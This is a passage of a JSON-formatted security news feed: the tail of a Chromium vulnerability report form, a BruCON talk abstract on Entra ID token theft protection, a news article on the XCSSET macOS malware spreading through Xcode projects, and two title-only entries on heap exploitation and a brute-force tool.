in?\n\t\t\t\t\t\n\n\t\t\t\t\t\n\t\t\t\t\t\tVersion 137.0.7151.107\n\t\t\t\t\t \n\n\t\t\t\t\t\n\t\t\t\t\t\tIs the security issue related to a crash?\n\t\t\t\t\t\n\n\t\t\t\t\t\n\t\t\t\t\t\tNo, it is not related to a crash.\n\t\t\t\t\t \n\n\t\t\t\t\t\n\t\t\t\t\t\tChoose the type of vulnerability\n\t\t\t\t\t\n\n\t\t\t\t\t\n\t\t\t\t\t\tSite Isolation Bypass\n\t\t\t\t\t \n\n\t\t\t\t\t\n\t\t\t\t\t\tHow would you like to be publicly acknowledged for your report?\n\t\t\t\t\t\n\n\t\t\t\t\t\n\t\t\t\t\t\t@RenwaX23\n\t\t\t\t\t \n\t\t\t\t\n\t\t\t\n\t\t\n\n\t\t\n\t\t\t\n\t\t\t\t\n\t\t\t\t\t \n\t\t\t\t\n\n\t\t\t\t\n\t\t\t\t\t\n\t\t\t\t\t\tchrome_ios_shortcuts_uxss.mp4\n\t\t\t\t\t\n\n\t\t\t\t\t\n\t\t\t\t\t\t26 MB\n\t\t\t\t\t\n\n\t\t\t\t\t\n\t\t\t\t\t\tDownload\n\t\t\t\t\t\n\t\t\t\t\n\t\t\t\n\t\t\n\t\n\n\n\n\t\n\t\t \n\t\n\n\t\n\t\tSursa: https:\/\/issues.chromium.org\/issues\/426631847\n\t\n\n\t\n\t\tVia: https:\/\/x.com\/RenwaX23\/status\/1971925046047498432","pubDate":"Sun, 28 Sep 2025 08:13:06 +0000"},{"title":"09 - BruCON 0x11 - Deep-dive to Entra ID Token Theft Protection - Nestori Syynimaa","link":{},"description":"Token Theft attacks have risen during the past few years as organisations have moved to stronger authentication methods. Entra ID has built-in protections to mitigate these attacks. This session will cover how to use these protections and technical details of how they work under the hood. Although 99 % of identity attacks are still password-related, organisations are moving to using stronger authentication methods, making these attacks obsolete. In recent years, we have witnessed a rising number of Token Theft attacks. As tokens are issued after successful login, attackers can use them to impersonate users without a need to care about the authentication methods used. The two most often used Token Theft techniques are Adversary-in-the-Middle (AitM) attacks and malware on the endpoint. The former can be performed remotely (e.g., via phishing), whereas the latter requires access to the victim\u2019s endpoint (much harder). In this demo-packed session, I will cover various Entra ID built-in Token Theft protection techniques, such as Token Protection and Continuous Access Evaluation (CAE). These techniques are not silver bullets though, so I will share the technical details of how they work under the hood. I will show what they really protect against, but also how threat actors can leverage them in specific scenarios. After the session, you will know the technical details of Entra ID Token Theft protection features, how to use them, how threat actors may leverage them, and how to detect this.","pubDate":"Sun, 28 Sep 2025 08:11:49 +0000"},{"title":"Microsoft spots fresh XCSSET malware strain hiding in Apple dev projects","link":{},"description":"Microsoft spots fresh XCSSET malware strain hiding in Apple dev projects\n\t\t\n\t\n\n\t\n\t\t\n\t\t\tUpgraded nasty slips into Xcode builds, steals crypto, and disables macOS defenses\n\t\t\n\n\t\t\n\t\t\t\n\t\t\t\tCarly Page\n\t\t\t\n\n\t\t\t\n\t\t\t\tFri 26 Sep 2025 \/\/ 15:23 UTC\n\t\t\t\n\t\t\n\t\n\n\n\n\t\n\t\t\n\t\t\t\n\t\t\t\t \n\t\t\t\n\t\t\n\n\t\t\n\t\t\t\n\t\t\t\t\n\t\t\t\t\t\n\t\t\t\t\t\tThe long-running XCSSET malware strain has evolved again, with Microsoft warning of a new macOS variant that expands its bag of tricks while continuing to target developers.\n\t\t\t\t\t \n\n\t\t\t\t\t\n\t\t\t\t\t\tRedmond's threat hunters said the latest version of XCSSET, which has been circulating since at least 2020, continues to spread by attaching itself to Xcode projects but now sports new capabilities to further complicate the lives of victims. Xcode is a suite of developer tools for building apps on Apple devices.\n\t\t\t\t\t \n\n\t\t\t\t\t\n\t\t\t\t\t\t \n\t\t\t\t\t \n\n\t\t\t\t\t\n\t\t\t\t\t\tThis isn't the first time it has re-emerged. Back in February, Microsoft warned that a resurgence of the malware had already been using compromised developer projects to deliver malicious payloads. Now the gang behind it appears to have gone further, building in stealthier persistence mechanisms, more obfuscation, and a a growing appetite for crypto theft.\n\t\t\t\t\t \n\n\t\t\t\t\t\n\t\t\t\t\t\t \n\t\t\t\t\t \n\n\t\t\t\t\t\n\t\t\t\t\t\tThe infection chain looks familiar \u2013 four stages, culminating in the execution of various submodules \u2013 but the final stage has been reworked. Among the more notable changes is a module that targets Firefox, stealing information with the help of a retooled build of the open source HackBrowserData tool. There's also a new clipboard hijacker designed to monitor copied text and replace cryptocurrency wallet addresses with those belonging to the attackers.\n\t\t\t\t\t \n\n\t\t\t\t\t\n\t\t\t\t\t\t \n\t\t\t\t\t\n\n\t\t\t\t\t\n\t\t\t\t\t\tAdditionally, Microsoft reports that the malware installs a LaunchDaemon that executes a hidden payload called .root and even drops a bogus System Settings.app file in \/tmp to conceal its activity.\n\t\t\t\t\t \n\n\t\t\t\t\t\n\t\t\t\t\t\tThe authors have also added more layers of obfuscation, including the use of run-only compiled AppleScripts, and the malware attempts to blunt Apple's defenses by disabling macOS automatic updates and Rapid Security Responses. Microsoft says these tweaks suggest the operators are intent on sticking around undetected for as long as possible while broadening their chances of monetization.\n\t\t\t\t\t \n\n\t\t\t\t\t\n\t\t\t\t\t\t \n\t\t\t\t\t \n\n\t\t\t\t\t\n\t\t\t\t\t\tFor developers, the threat vector remains the same: the malware slips into Xcode projects, so when a developer builds the code, they unwittingly execute the malicious payload. In February, researchers warned that compromised repositories and shared projects were already serving as distribution vehicles. This latest iteration makes embedding easier by using various strategies within project settings to evade detection.\n\t\t\t\t\t \n\n\t\t\t\t\t\n\t\t\t\t\t\tMicrosoft stressed that attacks seen so far have been limited, but given XCSSET's persistence over the years, the new modules are a reminder that Apple's developer ecosystem remains a ripe target. The company has shared its findings with Apple and collaborated with GitHub to remove repositories affected by XCSSET.\n\t\t\t\t\t \n\n\t\t\t\t\t\n\t\t\t\t\t\t \n\t\t\t\t\t \n\n\t\t\t\t\t\n\t\t\t\t\t\tThe company is also urging developers to scrutinize projects before running builds, keep macOS patched, and use endpoint security tools capable of detecting suspicious daemons and property list modifications. It's a warning Redmond knows the value of firsthand, having faced its own share of malware and state-backed intrusions in recent years.\n\t\t\t\t\t \n\n\t\t\t\t\t\n\t\t\t\t\t\tXCSSET may not have the same name recognition as LockBit or other ransomware gangs, but it has proven surprisingly resilient. For anyone working in Xcode, the takeaway is clear: don't assume a project is safe \u2013 the next build you run could be doing far more than you expect. \u00ae\n\t\t\t\t\t \n\n\t\t\t\t\t\n\t\t\t\t\t\t \n\t\t\t\t\t \n\n\t\t\t\t\t\n\t\t\t\t\t\tSursa: https:\/\/www.theregister.com\/2025\/09\/26\/microsoft_xcsset_macos\/","pubDate":"Sun, 28 Sep 2025 08:10:12 +0000"},{"title":"Windows Heap Exploitation - From Heap Overflow to Arbitrary R\/W","link":{},"description":{},"pubDate":"Sun, 28 Sep 2025 08:09:18 +0000"},{"title":"BruteForceAI - AI-Powered Login Brute Force Tool","link":{},"description":{},"pubDate":"Sun, 28 Sep 2025 08:08:43 +0000"}]}}